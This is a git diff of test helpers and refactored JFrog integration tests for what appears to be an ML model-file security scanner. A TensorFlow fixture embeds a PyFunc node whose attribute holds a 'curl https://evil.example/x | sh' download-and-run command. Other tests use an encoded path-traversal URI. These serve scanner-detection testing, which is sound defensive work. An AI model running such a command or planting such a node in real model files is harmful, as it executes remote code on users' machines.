"Callable[[pytest.MonkeyPatch], None]", _fixtures._force_framework_metadata_unresolved +) +_frame_first_large_malicious_eval_pickle_payload = cast( + Callable[[], bytes], _fixtures._frame_first_large_malicious_eval_pickle_payload +) +_frame_first_raw_storage_bytes = cast(Callable[[], bytes], _fixtures._frame_first_raw_storage_bytes) +_large_proto0_system_payload = cast(Callable[[], bytes], _fixtures._large_proto0_system_payload) +_make_dup_heavy_pickle = cast(_DupHeavyPayload, _fixtures._make_dup_heavy_pickle) +_make_memo_expansion_pickle = cast(_MemoExpansionPayload, _fixtures._make_memo_expansion_pickle) +_make_pre_memoized_post_budget_stack_global_payload = cast( + Callable[[bytes], bytes], _fixtures._make_pre_memoized_post_budget_stack_global_payload +) +_pickle_binint = cast(Callable[[int], bytes], _fixtures._pickle_binint) +_pickle_int_tuple = cast(Callable[[tuple[int, ...]], bytes], _fixtures._pickle_int_tuple) +_pickleish_tensor_storage_bytes = cast(Callable[[], bytes], _fixtures._pickleish_tensor_storage_bytes) +_pytorch_storage_protocol0_persistent_id_payload = cast( + _StorageProtocol0Payload, _fixtures._pytorch_storage_protocol0_persistent_id_payload +) +_pytorch_storage_then_arbitrary_protocol0_persistent_id_payload = cast( + Callable[[str], bytes], _fixtures._pytorch_storage_then_arbitrary_protocol0_persistent_id_payload +) +_require_torch_distribution = cast(Callable[[], None], _fixtures._require_torch_distribution) +_shadow_framework_divergence_cases = cast( + Callable[[], tuple[object, ...]], _fixtures._shadow_framework_divergence_cases +) +_shadow_newobj_build_payload = cast(_ShadowBuildPayload, _fixtures._shadow_newobj_build_payload) +_shadow_slot_state_build_payload = cast(Callable[[], bytes], _fixtures._shadow_slot_state_build_payload) +pickle_short_binunicode = cast(Callable[[bytes], bytes], _fixtures._short_binunicode) +_static_getattr_protocol0_unicode_payload = cast( + Callable[[], bytes], _fixtures._static_getattr_protocol0_unicode_payload +) +_yolov5n6_tensor_storage_prefix_bytes = cast(Callable[[], bytes], _fixtures._yolov5n6_tensor_storage_prefix_bytes) +_replace_source_on_read = cast( + "Callable[[pytest.MonkeyPatch, Path, Path, Path], None]", _fixtures._replace_source_on_read +) +_replace_source_after_fstat = cast( + "Callable[[pytest.MonkeyPatch, Path, Path, Path], None]", _fixtures._replace_source_after_fstat +) diff --git a/tests/helpers/processes.py b/tests/helpers/processes.py new file mode 100644 index 000000000..8138230ff --- /dev/null +++ b/tests/helpers/processes.py @@ -0,0 +1,9 @@ +"""Helpers for isolated Python import checks.""" + +import subprocess +import sys + + +def assert_scanners_absent_in_subprocess(code: str) -> None: + result = subprocess.run([sys.executable, "-c", code], capture_output=True, check=True, text=True) + assert result.stdout.strip() == "False" diff --git a/tests/helpers/scanners.py b/tests/helpers/scanners.py new file mode 100644 index 000000000..a8f1f8a97 --- /dev/null +++ b/tests/helpers/scanners.py @@ -0,0 +1,158 @@ +"""Shared scanner callbacks for orchestration regression tests.""" + +import builtins +import zipfile +from collections.abc import Callable +from pathlib import Path +from typing import Any, Literal + +import pytest + +from modelaudit.analysis.unified_context import UnifiedMLContext +from modelaudit.scanners.base import BaseScanner, CheckStatus, IssueSeverity, ScanResult +from modelaudit.scanners.zip_scanner import ZipScanner +from modelaudit.whitelists import POPULAR_MODELS + + +def scan_with_whitelisted_finding(self: ZipScanner, path: str) -> ScanResult: + self.context = UnifiedMLContext( + file_path=Path(path), + file_size=Path(path).stat().st_size, + file_type=".keras", + model_id=next(iter(POPULAR_MODELS)), + model_source="huggingface", + ) + result = self._create_result() + result.add_check( + name="Fallback Security Finding", + passed=False, + message="High confidence fallback anomaly", + severity=IssueSeverity.CRITICAL, + rule_code="CUSTOM001", + ) + result.finish(success=True) + assert result.issues[0].severity == IssueSeverity.INFO + return result + + +def scan_nested_critical_finding(path: str, _config: dict[str, Any]) -> ScanResult: + nested_result = ScanResult(scanner_name="test_nested") + nested_result.add_check( + name="Nested Critical Finding", + passed=False, + message="Nested member is malicious", + severity=IssueSeverity.CRITICAL, + location=path, + ) + nested_result.finish(success=False) + return nested_result + + +def without_keras_zip_scanner( + original: Callable[[str], type[BaseScanner] | None], +) -> Callable[[str], type[BaseScanner] | None]: + def load_scanner(scanner_id: str) -> type[BaseScanner] | None: + if scanner_id == "keras_zip": + return None + return original(scanner_id) + + return load_scanner + + +def fail_onnx_bounded_discovery(*_args: Any, **_kwargs: Any) -> Any: + from modelaudit.scanners import onnx_scanner + + raise onnx_scanner._OnnxStructureParseError( + "retained_object_limit_exceeded", + "bounded discovery exhausted its retained-object budget", + ) + + +def scan_nested_unsuccessful(_path: str, _config: dict[str, Any]) -> ScanResult: + nested_result = ScanResult(scanner_name="test_nested") + nested_result.finish(success=False) + return nested_result + + +def assert_preflighted_archive_survives_replacement( + monkeypatch: pytest.MonkeyPatch, + model_path: Path, + replacement_path: Path, + scanner_type: type[BaseScanner], + zip_scanner_type: type[ZipScanner], +) -> None: + original_scan_archive_members = zip_scanner_type.scan_archive_members + original_open = builtins.open + path_reopened = False + + def redirect_path_open(file: Any, *args: Any, **kwargs: Any) -> Any: + nonlocal path_reopened + if str(file) == str(model_path): + path_reopened = True + file = replacement_path + return original_open(file, *args, **kwargs) + + def replace_then_scan( + scanner: ZipScanner, + path: str, + archive: zipfile.ZipFile | None = None, + ) -> ScanResult: + assert archive is not None + with monkeypatch.context() as path_swap: + path_swap.setattr(builtins, "open", redirect_path_open) + return original_scan_archive_members(scanner, path, archive=archive) + + monkeypatch.setattr(zip_scanner_type, "scan_archive_members", replace_then_scan) + + result = scanner_type().scan(str(model_path)) + + assert path_reopened is False + assert not any(issue.details.get("zip_entry") == "payload.pkl" for issue in result.issues) + assert any(entry.get("path", "").endswith(":safe.txt") for entry in result.metadata["contents"]) + assert not any(entry.get("path", "").endswith(":payload.pkl") for entry in result.metadata["contents"]) + + +def install_zip_open_failure( + monkeypatch: pytest.MonkeyPatch, + original_open: Callable[..., Any], + matches: Callable[[str | zipfile.ZipInfo], bool], + make_error: Callable[[], Exception], + *, + positional_mode: bool = True, +) -> None: + def open_with_failure( + archive: zipfile.ZipFile, + name: str | zipfile.ZipInfo, + mode: Literal["r", "w"] = "r", + pwd: bytes | None = None, + *, + force_zip64: bool = False, + ) -> Any: + if matches(name): + raise make_error() + if positional_mode: + return original_open(archive, name, mode, pwd, force_zip64=force_zip64) + return original_open(archive, name, mode=mode, pwd=pwd, force_zip64=force_zip64) + + monkeypatch.setattr(zipfile.ZipFile, "open", open_with_failure) + + +def assert_skops_cve_clean(scanner: BaseScanner, skops_file: Path, check_name: str) -> None: + result = scanner.scan(str(skops_file)) + + cve_checks = [c for c in result.checks if check_name in c.name] + assert not [c for c in cve_checks if c.status == CheckStatus.FAILED] + + +def track_bytesio_close(monkeypatch: pytest.MonkeyPatch) -> dict[str, bool]: + import io + + closed: dict[str, bool] = {} + + class TrackedBytesIO(io.BytesIO): + def close(self) -> None: + closed["closed"] = True + super().close() + + monkeypatch.setattr(io, "BytesIO", TrackedBytesIO) + return closed diff --git a/tests/helpers/tensorflow.py b/tests/helpers/tensorflow.py new file mode 100644 index 000000000..2ac2c1291 --- /dev/null +++ b/tests/helpers/tensorflow.py @@ -0,0 +1,48 @@ +"""Shared protobuf-only TensorFlow fixture helpers.""" + +import importlib +from typing import cast + +import pytest + +from modelaudit.utils.tensorflow_compat import has_tensorflow_protobuf_stubs as _has_tf_protos + + +def _require_tf_protos() -> None: + if not _has_tf_protos(): + pytest.skip("TensorFlow protobuf stubs unavailable") + + +def _build_malicious_tf_savedmodel() -> bytes: + return build_tf_savedmodel("pyfunc_node", "PyFunc") + + +def build_tf_savedmodel(node_name: str | None, operation: str, version: str | None = None) -> bytes: + _require_tf_protos() + import modelaudit.protos # noqa: F401 + + saved_model_pb2 = importlib.import_module("tensorflow.core.protobuf.saved_model_pb2") + saved_model = saved_model_pb2.SavedModel() + saved_model.saved_model_schema_version = 1 + metagraph = saved_model.meta_graphs.add() + if version is not None: + metagraph.meta_info_def.meta_graph_version = version + node = metagraph.graph_def.node.add() + if node_name is not None: + node.name = node_name + node.op = operation + return cast(bytes, saved_model.SerializeToString()) + + +def build_malicious_tf_metagraph(version: str) -> bytes: + _require_tf_protos() + import modelaudit.protos # noqa: F401 + + meta_graph_pb2 = importlib.import_module("tensorflow.core.protobuf.meta_graph_pb2") + metagraph = meta_graph_pb2.MetaGraphDef() + metagraph.meta_info_def.meta_graph_version = version + node = metagraph.graph_def.node.add() + node.name = "pyfunc_node" + node.op = "PyFunc" + node.attr["func"].s = b"python -c 'import os; os.system(\"curl https://evil.example/x | sh\")'" + return cast(bytes, metagraph.SerializeToString()) diff --git a/tests/helpers/text.py b/tests/helpers/text.py new file mode 100644 index 000000000..4bc63d166 --- /dev/null +++ b/tests/helpers/text.py @@ -0,0 +1,14 @@ +"""Text instrumentation shared by scanner tests.""" + + +class LowerCountingText(str): + lower_calls: int + + def __new__(cls, value: str) -> "LowerCountingText": + instance = super().__new__(cls, value) + instance.lower_calls = 0 + return instance + + def lower(self) -> str: + self.lower_calls += 1 + return super().lower() diff --git a/tests/integrations/test_jfrog.py b/tests/integrations/test_jfrog.py index 32e1f86a0..2d8502f6f 100644 --- a/tests/integrations/test_jfrog.py +++ b/tests/integrations/test_jfrog.py @@ -9,7 +9,7 @@ import sys import tarfile import zipfile -from collections.abc import Iterator +from functools import partial from pathlib import Path from typing import cast from unittest.mock import MagicMock, patch @@ -49,16 +49,19 @@ redact_jfrog_url_for_display, ) from tests.helpers import create_mock_coreml, create_mock_mxnet_symbol, create_mock_onnx +from tests.helpers.file_creators import ( + _encode_protobuf_varint as _encode_proto_varint, +) +from tests.helpers.file_creators import ( + ubjson_key as _ubjson_key, +) +from tests.helpers.file_creators import ( + ubjson_string as _ubjson_string, +) +from tests.helpers.http import FakeStreamingResponse -class _FakeStreamingResponse: - def __init__(self, payload: bytes, *, status_code: int = 200, headers: dict[str, str] | None = None) -> None: - self.payload = payload - self.status_code = status_code - self.headers = headers or {} - self.cookies = requests.cookies.RequestsCookieJar() - self.closed = False - +class _FakeStreamingResponse(FakeStreamingResponse): def raise_for_status(self) -> None: if self.status_code >= 400: error_response = MagicMock(spec=requests.Response) @@ -66,13 +69,6 @@ def raise_for_status(self) -> None: raise requests.exceptions.HTTPError(response=error_response) return None - def iter_content(self, chunk_size: int = 1) -> Iterator[bytes]: - for offset in range(0, len(self.payload), chunk_size): - yield self.payload[offset : offset + chunk_size] - - def close(self) -> None: - self.closed = True - @pytest.mark.parametrize( ("selected_scanner", "detected_format", "expected"), @@ -143,26 +139,6 @@ def _fake_json_response(payload: object, *, headers: dict[str, str] | None = Non return _FakeStreamingResponse(json.dumps(payload).encode(), headers=headers) -def _encode_proto_varint(value: int) -> bytes: - if value < 0: - raise ValueError("protobuf varints cannot encode negative values") - - encoded = bytearray() - while value > 0x7F: - encoded.append((value & 0x7F) | 0x80) - value >>= 7 - encoded.append(value) - return bytes(encoded) - - -def _ubjson_key(key: bytes) -> bytes: - return b"U" + bytes([len(key)]) + key - - -def _ubjson_string(value: bytes) -> bytes: - return b"SL" + len(value).to_bytes(8, byteorder="big", signed=True) + value - - def _build_tensorflow_remote_route_payloads() -> dict[str, bytes]: """Build minimal vendored-proto TensorFlow fixtures without importing TensorFlow itself.""" import modelaudit.protos # noqa: F401 @@ -1594,17 +1570,7 @@ def mock_detect_side_effect(url: str, *args: object, **kwargs: object) -> dict: @patch("modelaudit.utils.sources.jfrog.detect_jfrog_target_type") def test_list_jfrog_folder_contents_rejects_encoded_traversal(self, mock_detect: MagicMock) -> None: """Prepared URL normalization must not escape the requested folder.""" - mock_detect.return_value = { - "type": "folder", - "children": [{"uri": "/%2e%2e/secret.pt", "folder": False, "size": 4}], - } - - with pytest.raises(ValueError, match="Unsafe JFrog child path"): - list_jfrog_folder_contents( - "https://company.jfrog.io/artifactory/repo/models/", - recursive=False, - selective=False, - ) + _assert_unsafe_jfrog_child_path(mock_detect, ("/%2e%2e/secret.pt")) @patch("modelaudit.utils.sources.jfrog.detect_jfrog_target_type") def test_list_jfrog_folder_contents_allows_encoded_filename(self, mock_detect: MagicMock) -> None: @@ -1625,17 +1591,7 @@ def test_list_jfrog_folder_contents_allows_encoded_filename(self, mock_detect: M @patch("modelaudit.utils.sources.jfrog.detect_jfrog_target_type") def test_list_jfrog_folder_contents_rejects_invalid_encoded_utf8(self, mock_detect: MagicMock) -> None: """Invalid encoded bytes must not collapse into a shared canonical path.""" - mock_detect.return_value = { - "type": "folder", - "children": [{"uri": "/%FF/model.pt", "folder": False, "size": 4}], - } - - with pytest.raises(ValueError, match="Unsafe JFrog child path"): - list_jfrog_folder_contents( - "https://company.jfrog.io/artifactory/repo/models/", - recursive=False, - selective=False, - ) + _assert_unsafe_jfrog_child_path(mock_detect, ("/%FF/model.pt")) @patch("modelaudit.utils.sources.jfrog._MAX_JFROG_LISTING_ENTRIES", 1) @patch("modelaudit.utils.sources.jfrog.detect_jfrog_target_type") @@ -2400,14 +2356,8 @@ def get_side_effect(url: str, **_kwargs: object) -> _FakeStreamingResponse: return _FakeStreamingResponse(preview_payload) raise AssertionError(f"unexpected content probe: {url}") - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - filename = Path(url).name - downloaded_file = cache_dir / filename - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - mock_get.side_effect = get_side_effect - mock_download.side_effect = download_side_effect + mock_download.side_effect = _write_plain_mock_download result_dir = download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -2534,12 +2484,7 @@ def test_download_jfrog_folder_selective_includes_local_bounded_content_routes( ] mock_get.side_effect = lambda url, **_kwargs: _FakeStreamingResponse(payloads[url]) - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -2569,12 +2514,7 @@ def test_download_jfrog_folder_selective_includes_jax_json_checkpoint( ] mock_get.return_value = _FakeStreamingResponse(payload) - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -2617,12 +2557,7 @@ def test_download_jfrog_folder_scanner_selection_preserves_bounded_jax_json_cand ] mock_get.side_effect = lambda url, **_kwargs: _FakeStreamingResponse(payloads[url]) - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -2652,12 +2587,7 @@ def test_download_jfrog_folder_selective_includes_truncated_flax_prefix( ] mock_get.return_value = _FakeStreamingResponse(payload) - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -2694,12 +2624,7 @@ def test_download_jfrog_folder_selective_includes_inconclusive_flax_prefix( ] mock_get.return_value = _FakeStreamingResponse(payload) - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -2772,12 +2697,7 @@ def test_download_jfrog_folder_scanner_selection_preserves_xgboost_content_route ] mock_get.side_effect = lambda url, **_kwargs: _FakeStreamingResponse(payloads[url]) - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -2821,12 +2741,7 @@ def test_download_jfrog_folder_json_probe_stays_within_sniff_cap( ] mock_get.return_value = _FakeStreamingResponse(payload) - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") with pytest.raises(ValueError, match="No scannable model files found"): download_jfrog_folder( @@ -2901,12 +2816,7 @@ def test_download_jfrog_folder_selective_includes_tensorflow_protobuf_routes( ] mock_get.side_effect = lambda url, **_kwargs: _FakeStreamingResponse(payloads[url]) - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -3044,12 +2954,7 @@ def test_download_jfrog_folder_probe_preserves_credentials_on_trusted_redirect( {"name": "evil.payload", "path": hidden_url, "size": len(payload), "human_size": "24 B"} ] - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -3097,12 +3002,7 @@ def test_download_jfrog_folder_probe_allows_default_port_redirect( {"name": "model.payload", "path": hidden_url, "size": len(payload), "human_size": "24 B"} ] - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -3154,12 +3054,7 @@ def test_download_jfrog_folder_selective_includes_structured_remote_routes( ] mock_get.side_effect = lambda url, **_kwargs: _FakeStreamingResponse(payloads[url]) - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") result_dir = download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -3189,12 +3084,7 @@ def test_download_jfrog_folder_preserves_truncated_onnx_probe_candidate( ] mock_get.return_value = _FakeStreamingResponse(payload) - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -3234,12 +3124,7 @@ def test_download_jfrog_folder_scanner_selection_preserves_structure_routed_zip( ] mock_get.return_value = _FakeStreamingResponse(payload) - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -3339,12 +3224,7 @@ def test_download_jfrog_folder_scanner_selection_preserves_executable_zip_polygl ] mock_get.side_effect = lambda url, **_kwargs: _FakeStreamingResponse(payloads[url]) - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -3379,12 +3259,7 @@ def test_download_jfrog_folder_scanner_selection_preserves_compressed_tar_candid ] mock_get.return_value = _FakeStreamingResponse(payload) - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"mock file content") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -3496,13 +3371,8 @@ def get_side_effect(url: str, **_kwargs: object) -> _FakeStreamingResponse: return _FakeStreamingResponse(pickle_payload) raise AssertionError(f"unexpected content probe: {url}") - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(url).name - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - mock_get.side_effect = get_side_effect - mock_download.side_effect = download_side_effect + mock_download.side_effect = _write_plain_mock_download download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -3576,13 +3446,7 @@ def test_download_jfrog_folder_selected_extensions_do_not_probe_skipped_content( }, ] - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - filename = Path(url).name - downloaded_file = cache_dir / filename - downloaded_file.write_bytes(b"mock file content") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = _write_plain_mock_download download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -3634,30 +3498,15 @@ def test_download_jfrog_folder_rejects_case_insensitive_local_collisions( tmp_path: Path, ) -> None: """Folder downloads must fail closed before local case aliases overwrite each other.""" - mock_list.return_value = [ - { - "name": "Model.pkl", - "path": "https://company.jfrog.io/artifactory/repo/models/Model.pkl", - "size": 8, - "human_size": "8 B", - }, - { - "name": "model.pkl", - "path": "https://company.jfrog.io/artifactory/repo/models/model.pkl", - "size": 8, - "human_size": "8 B", - }, - ] - - with pytest.raises(ValueError, match="Colliding local JFrog artifact paths"): - download_jfrog_folder( - "https://company.jfrog.io/artifactory/repo/models/", - cache_dir=tmp_path, - show_progress=False, - ) - - mock_download.assert_not_called() - assert not any(tmp_path.iterdir()) + _assert_jfrog_local_collision( + mock_list, + mock_download, + tmp_path, + ("Model.pkl"), + ("https://company.jfrog.io/artifactory/repo/models/Model.pkl"), + ("model.pkl"), + ("https://company.jfrog.io/artifactory/repo/models/model.pkl"), + ) @patch("modelaudit.utils.sources.jfrog.download_artifact") @patch("modelaudit.utils.sources.jfrog.list_jfrog_folder_contents") @@ -3668,30 +3517,15 @@ def test_download_jfrog_folder_rejects_trailing_dot_local_collisions( tmp_path: Path, ) -> None: """Windows trailing-dot aliases must fail before either artifact is downloaded.""" - mock_list.return_value = [ - { - "name": "team/model.pkl", - "path": "https://company.jfrog.io/artifactory/repo/models/team/model.pkl", - "size": 8, - "human_size": "8 B", - }, - { - "name": "team./model.pkl", - "path": "https://company.jfrog.io/artifactory/repo/models/team./model.pkl", - "size": 8, - "human_size": "8 B", - }, - ] - - with pytest.raises(ValueError, match="Colliding local JFrog artifact paths"): - download_jfrog_folder( - "https://company.jfrog.io/artifactory/repo/models/", - cache_dir=tmp_path, - show_progress=False, - ) - - mock_download.assert_not_called() - assert not any(tmp_path.iterdir()) + _assert_jfrog_local_collision( + mock_list, + mock_download, + tmp_path, + ("team/model.pkl"), + ("https://company.jfrog.io/artifactory/repo/models/team/model.pkl"), + ("team./model.pkl"), + ("https://company.jfrog.io/artifactory/repo/models/team./model.pkl"), + ) @patch("modelaudit.utils.sources.jfrog.download_artifact") @patch("modelaudit.utils.sources.jfrog.list_jfrog_folder_contents") @@ -3702,30 +3536,15 @@ def test_download_jfrog_folder_rejects_file_directory_local_collisions( tmp_path: Path, ) -> None: """A selected file must not alias another selected artifact's parent directory.""" - mock_list.return_value = [ - { - "name": "model.pkl/child.pt", - "path": "https://company.jfrog.io/artifactory/repo/models/model.pkl/child.pt", - "size": 8, - "human_size": "8 B", - }, - { - "name": "Model.pkl", - "path": "https://company.jfrog.io/artifactory/repo/models/Model.pkl", - "size": 8, - "human_size": "8 B", - }, - ] - - with pytest.raises(ValueError, match="Colliding local JFrog artifact paths"): - download_jfrog_folder( - "https://company.jfrog.io/artifactory/repo/models/", - cache_dir=tmp_path, - show_progress=False, - ) - - mock_download.assert_not_called() - assert not any(tmp_path.iterdir()) + _assert_jfrog_local_collision( + mock_list, + mock_download, + tmp_path, + ("model.pkl/child.pt"), + ("https://company.jfrog.io/artifactory/repo/models/model.pkl/child.pt"), + ("Model.pkl"), + ("https://company.jfrog.io/artifactory/repo/models/Model.pkl"), + ) @patch("modelaudit.utils.sources.jfrog.download_artifact") @patch("modelaudit.utils.sources.jfrog.list_jfrog_folder_contents") @@ -3796,12 +3615,7 @@ def test_download_jfrog_folder_allows_reserved_name_near_match( artifact_url = "https://company.jfrog.io/artifactory/repo/models/null.pkl" mock_list.return_value = [{"name": "null.pkl", "path": artifact_url, "size": 8, "human_size": "8 B"}] - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"payload") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"payload") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -3905,12 +3719,7 @@ def test_download_jfrog_folder_allows_benign_distinct_local_names( {"name": "team-b/model.pkl", "path": second_url, "size": 8, "human_size": "8 B"}, ] - def download_side_effect(url: str, cache_dir: Path, **_kwargs: object) -> Path: - downloaded_file = cache_dir / Path(urlparse(url).path).name - downloaded_file.write_bytes(b"payload") - return downloaded_file - - mock_download.side_effect = download_side_effect + mock_download.side_effect = partial(_write_mock_download, b"payload") download_jfrog_folder( "https://company.jfrog.io/artifactory/repo/models/", @@ -4004,3 +3813,64 @@ def test_download_jfrog_folder_cleans_owned_temp_dir_on_failure( ) assert not owned_download_dir.exists() + + +def _write_mock_download(payload: bytes, /, url: str, cache_dir: Path, **_kwargs: object) -> Path: + downloaded_file = cache_dir / Path(urlparse(url).path).name + downloaded_file.write_bytes(payload) + return downloaded_file + + +def _write_plain_mock_download(url: str, cache_dir: Path, **_kwargs: object) -> Path: + downloaded_file = cache_dir / Path(url).name + downloaded_file.write_bytes(b"mock file content") + return downloaded_file + + +def _assert_jfrog_local_collision( + mock_list: MagicMock, + mock_download: MagicMock, + tmp_path: Path, + case_first_name: str, + case_first_url: str, + case_second_name: str, + case_second_url: str, +) -> None: + mock_list.return_value = [ + { + "name": case_first_name, + "path": case_first_url, + "size": 8, + "human_size": "8 B", + }, + { + "name": case_second_name, + "path": case_second_url, + "size": 8, + "human_size": "8 B", + }, + ] + + with pytest.raises(ValueError, match="Colliding local JFrog artifact paths"): + download_jfrog_folder( + "https://company.jfrog.io/artifactory/repo/models/", + cache_dir=tmp_path, + show_progress=False, + ) + + mock_download.assert_not_called() + assert not any(tmp_path.iterdir()) + + +def _assert_unsafe_jfrog_child_path(mock_detect: MagicMock, case_child_uri: str) -> None: + mock_detect.return_value = { + "type": "folder", + "children": [{"uri": case_child_uri, "folder": False, "size": 4}], + } + + with pytest.raises(ValueError, match="Unsafe JFrog child path"): + list_jfrog_folder_contents( + "https://company.jfrog.io/artifactory/repo/models/", + recursive=False, + selective=False, + ) diff --git a/tests/integrations/test_jfrog_redirect_security.py b/tests/integrations/test_jfrog_redirect_security.py index 1630d6e59..07a2f57b7 100644 --- a/tests/integrations/test_jfrog_redirect_security.py +++ b/tests/integrations/test_jfrog_redirect_security.py @@ -1,4 +1,3 @@ -from collections.abc import Iterator from pathlib import Path from typing import Any from unittest.mock import MagicMock, patch @@ -7,25 +6,7 @@ import requests from modelaudit.utils.sources.jfrog import _JFROG_NO_NETRC_AUTH, download_artifact - - -class _FakeStreamingResponse: - def __init__(self, payload: bytes, *, status_code: int = 200, headers: dict[str, str] | None = None) -> None: - self.payload = payload - self.status_code = status_code - self.headers = headers or {} - self.cookies = requests.cookies.RequestsCookieJar() - self.closed = False - - def raise_for_status(self) -> None: - return None - - def iter_content(self, chunk_size: int = 1) -> Iterator[bytes]: - for offset in range(0, len(self.payload), chunk_size): - yield self.payload[offset : offset + chunk_size] - - def close(self) -> None: - self.closed = True +from tests.helpers.http import FakeStreamingResponse as _FakeStreamingResponse @pytest.mark.parametrize( @@ -123,23 +104,9 @@ def test_download_allows_public_ip_redirect_without_credentials( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setenv("MODELAUDIT_JFROG_ALLOWED_HOSTS", "company.jfrog.io") - redirect_response = _FakeStreamingResponse( - b"", - status_code=302, - headers={"Location": "https://93.184.216.34/artifacts/model.bin"}, + _assert_public_ip_redirect_without_credentials( + mock_get, tmp_path, monkeypatch, ("https://93.184.216.34/artifacts/model.bin") ) - final_response = _FakeStreamingResponse(b"data") - mock_get.side_effect = [redirect_response, final_response] - - result = download_artifact( - "https://company.jfrog.io/artifactory/repo/model.bin", - cache_dir=tmp_path, - api_token="test-token", - ) - - assert result.read_bytes() == b"data" - assert 